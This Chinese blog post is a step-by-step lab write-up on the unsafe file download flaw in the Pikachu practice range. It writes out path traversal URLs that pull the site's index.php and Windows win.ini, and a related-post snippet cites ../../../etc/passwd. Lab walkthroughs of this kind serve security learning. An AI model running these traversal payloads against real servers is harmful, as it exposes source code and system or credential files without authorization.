Pikachu靶场不安全的文件下载漏洞~保姆级教程!!!

已于 2024-05-23 09:57:48 修改
阅读量567 收藏 4
点赞数 13
分类专栏: Pikachu靶场 文章标签: 安全 web安全 网络安全
于 2024-05-23 09:57:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77360738/article/details/139135241
版权

目录

漏洞挖掘

漏洞测试

漏洞利用

总结

漏洞挖掘

1.登录pikachu靶场,开始尝试寻找文件下载漏洞的漏洞点在哪里!

2.点击图片下面的超链接,文件正常被下载到本地

3.但是url地址栏没有发生变化,使用bp抓包,看它使用了哪种传参方式

传参方式为get传参,传参的参数为filename,我们可以直接可以拼凑下载链接,完成下载文件。

http://靶机ip/vul/unsafedownload/execdownload.php?filename=(需要下载的文件名)

4.进入白盒测试,我们在该目录下新建一个txt文件,看是否可以完成下载

5.下载该目录下的文件1.txt,拼凑链接

http://靶机ip/vul/unsafedownload/execdownload.php?filename=1.txt 

漏洞测试

1.我们尝试一下,如果不在该目录下,是否可以下载,把1.txt放在在该目录的上一级目录里

http://靶机ip/vul/unsafedownload/execdownload.php?filename=../1.txt

成功下载不在该目录下的文件1.txt

2.我们再尝试一下,如果不在pikachu-master目录下,是否可以下载www目录下的1.txt文件

http://靶机ip/vul/unsafedownload/execdownload.php?filename=../../../../1.txt

思考:我们可以使用相对路径下载文件,那是否也可以使用绝对路径下载文件呢?

http://靶机ip/vul/unsafedownload/execdownload.php?filename=C:\phpstudy_pro\WWW\1.txt

 显示文件不存在,使用绝对路径下载文件失败

由此证明,我们只能使用相对路径下载文件,不能使用绝对路径。

漏洞利用

1.可以获取pikachu靶场的源码index.php

构造链接:http://靶机ip/vul/unsafedownload/execdownload.php?filename=../../../index.php

2.我们知道在windows目录下有一个配置文件win.ini,我们想要下载该文件,但是不确定文件所在位置,我们就多返回几级目录,构造链接:

http://靶机ip/vul/unsafedownload/execdownload.php?filename=../../../../../../../../../windows/win.ini

总结

不安全文件下载漏洞,只要我们知道文件的位置,我们就可以使用相对路径下载。

拾初。
关注
专栏目录
网络安全】基于PHPStudy的pikachu靶场下载安装详细教程
等风来
04-18 885
PHPStudy的下载安装教程本文略过。若页面回显如上图,说明站点搭建成功。解压到phpstudy的www目录下,接着在浏览器访问该链接
pikachu靶场--不安全文件下载/上传漏洞【7.1】~【8.3】
lmei1228的博客
06-14 526
文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。如果后台在收到请求的文件名后,将其直接拼进下载文件的路径中而不对其进行安全判断的话,则可能会引发不安全文件下载漏洞。此时如果 攻击者提交的不是一个程序预期的的文件名,而是一个精心构造的路径(比如../../../etc/passwd),则很有可能会直接将该指定的文件下载下来。
pikachu靶场安全文件下载漏洞简单演示
2301_77185537的博客
12-22 504
也就是说,一些网站由于业务需求,往往需要提供文件查看或文件下载功能,但若对用户查看或下载的文件不做限制,则恶意用户就能够查看或下载任意敏感文件,这就是文件查看与下载漏洞。简单来说就是网站提供了一个下载的操作功能,网站管理员没有进行严格的控制操作或者过滤检查,导致出现了恶意用户下载了网站的其他敏感文件,而不是下载了规定下载的文件。我们可以看见已经成功下载了敏感信息,这是举了其中一个例子,因为服务端没有做限制,我们同样可以尝试下载其他的敏感文件与页面目录。我们也可以右键将这个数据包发送到重发器模块。
pikachu~文件下载漏洞
最新发布
weixin_67832625的博客
08-09 337
发现文件开始下载,因此我们可以确定存在 Unsafe file download 漏洞。/ 返回上一,再进行猜目录等构造更复杂的下载路径来下载服务器中的敏感文件。
Pikachu靶场——不安全文件下载(Unsafe Filedownload)
来日可期的博客
10-04 1286
文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。如果后台在收到请求的文件名后,将其直接拼接到下载文件的路径中而不对其进行安全判断的话,则可能会引发不安全文件下载漏洞
pikachu靶场-7 不安全文件下载和上传
weixin_52180702的博客
12-13 1052
很多网站都会提供文件下载功能,即用户可以通过点击下载链接,下载到链接所对应的文件。但是,如果文件下载功能设计不当,则可能会导致攻击者可以通过构造文件路径,从而获取到后台服务器上的其他的敏感文件。文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。
Pikachu靶场之不安全文件下载漏洞详解
m0_46467017的博客
05-20 2776
Pikachu靶场之不安全文件下载漏洞详解前言文件包含漏洞简述1.漏洞描述2.漏洞原理3.漏洞危害4.漏洞发现5.如何防御正式闯关代码分析 前言 本篇文章用于巩固对自己文件下载漏洞的学习总结,其中部分内容借鉴了以下博客。 链接: pikachu Unsafe Filedownload 不安全文件下载 (皮卡丘漏洞平台通关系列)) 文件包含漏洞简述 1.漏洞描述 一些网站由于业务需求,往往需要提供文件查看或文件下载功能,但若对用户查看或下载的文件不做限制,则恶意用户就能够查看或下载任意敏感文件,这就是文
pikachu靶场全通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
pikachu靶场网盘下载
04-01
pikachu是一个漏洞练习平台。其中包含了常见的web安全漏洞,如果你是一个渗透测试学习者没有靶场练手,那么pikachu将是一个不错的选择。
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu-不安全文件下载
baidu_39504221的博客
11-21 257
点击科比下载抓包 结果 下载了ai的图片
六、pikachu安全文件下载
山兔的博客
09-17 251
1.不安全文件下载概述 一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。 如果后台在收到请求的文件名后,将其直接拼进下载文件的路径中而不对其进行安全判断的话,则可能会引发不安全文件下载漏洞。 处理: 在设计文件下载功能时,如果下载的目标文件是由前端传进来的,则一定要对传进来的文件进行安全考虑。 切记:所有与前端交互的数据都是不安全的,不能掉以轻心! 2.不安全
七、pikachu之不安全文件下载
qq_55202378的博客
08-24 218
pikachu安全文件下载
Pikachu4_Unsafe downloadfile(不安全文件下载)
weixin_44193247的博客
03-15 481
Pikachu漏洞复现练习篇
pikachu---不安全文件下载
m0_52822871的博客
09-02 223
在文章开始之前,首先要说明,本人只是个萌新,之所以写文章,只是当成学习笔记,所以有些内容可能并不专业,或许还会有错误。希望可以为大家提供一个简单的参考。 一 概述 文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成下载。 如果后台在收到请求的文件名后,将其直接拼进下载文件的路径中而不对其进行安全判断的话,则可能会引发不安全文件下载
Pikachu unsafe filedownload
m0_49025459的博客
04-26 403
概述 不安全文件下载概述 文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求, 一般这个请求会包含一个需要下载的文件名称,后台在收到请求后 会开始执行下载代码, 将该文件名对应的文件response给浏览器,从而完成下载。 如果后台在收到请求的文件名后, 将其直接拼进下载文件的路径中而不对其进行安全判断的话,则可能会引发不安全文件下载漏洞。 此时如果 攻击者提交的不是一个程序预期的的文件名, 而是一个精心构造的路径(比如../../../etc
pikachu Unsafe Filedownload 不安全文件下载 (皮卡丘漏洞平台通关系列)
箭雨镜屋
02-01 2095
这关也几乎是一步就能搞定 1、轻松过关 进入本关看到下图的页面,点击球员名字可以下载头像图片 点击之后直接下载了,没有页面跳转,地址栏的url没有变化 右键 查看网页源代码 通过球员名称快速定位到相关代码 类似 <a href="execdownload.php?filename=ai.png" >阿伦.艾弗森</a> 对应的就是文件下载的点 把execdownload.php?filename=和当前网页路径组装起来,后面接上我们想要的文件路径: 比如...
P6 PikaChu_Unsafe Filedownload 不安全文件下载
在下小黄的博客
03-23 362
大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 今天更新的是: P6 PikaChu_Unsafe Filedownload 不安全文件下载 往期检索:程序设计学习笔记——目录 创建时间:2021年3月23日 软件: MindMaster Pro 、Burp Suite Pro 、火狐浏览器 Unsafe Filedownload 不安全文件下载前言漏洞分析漏洞利用 前言 不安全文件下载概述: 文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便
pikachu靶场的文件上传漏洞挖掘怎么防御
04-03
文件上传漏洞是一种常见的安全漏洞,攻击者可以通过上传恶意文件来执行任意代码或者敏感信息。为了防御文件上传漏洞,可以采取以下措施: 1. 验证文件类型和文件名:在后端对上传的文件进行验证,确保文件类型和文件名符合预期。可以使用文件扩展名、MIME类型等方式进行验证。 2. 限制文件上传路径:将上传文件保存在指定的目录下,并限制上传路径的访问权限,避免上传文件到可执行目录或者敏感目录。 3. 文件内容检查:对上传的文件进行内容检查,可以使用文件头部信息、文件内容的特征等方式进行检查,确保文件内容的合法性。 4. 文件大小限制:限制上传文件的大小,避免上传过大的文件导致服务器资源耗尽。 5. 安全配置:确保服务器的安全配置正确,禁用不必要的文件上传功能,限制上传文件的大小和类型。 6. 文件重命名:将上传的文件重命名,避免使用原始文件名,防止攻击者利用文件名进行攻击。 7. 定期更新和维护:及时更新服务器和应用程序的补丁,修复已知的漏洞,保持系统的安全性。 8. 安全审计:定期进行安全审计,检查系统中是否存在文件上传漏洞,并及时修复。 通过以上措施,可以有效防御文件上传漏洞,提高系统的安全性。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值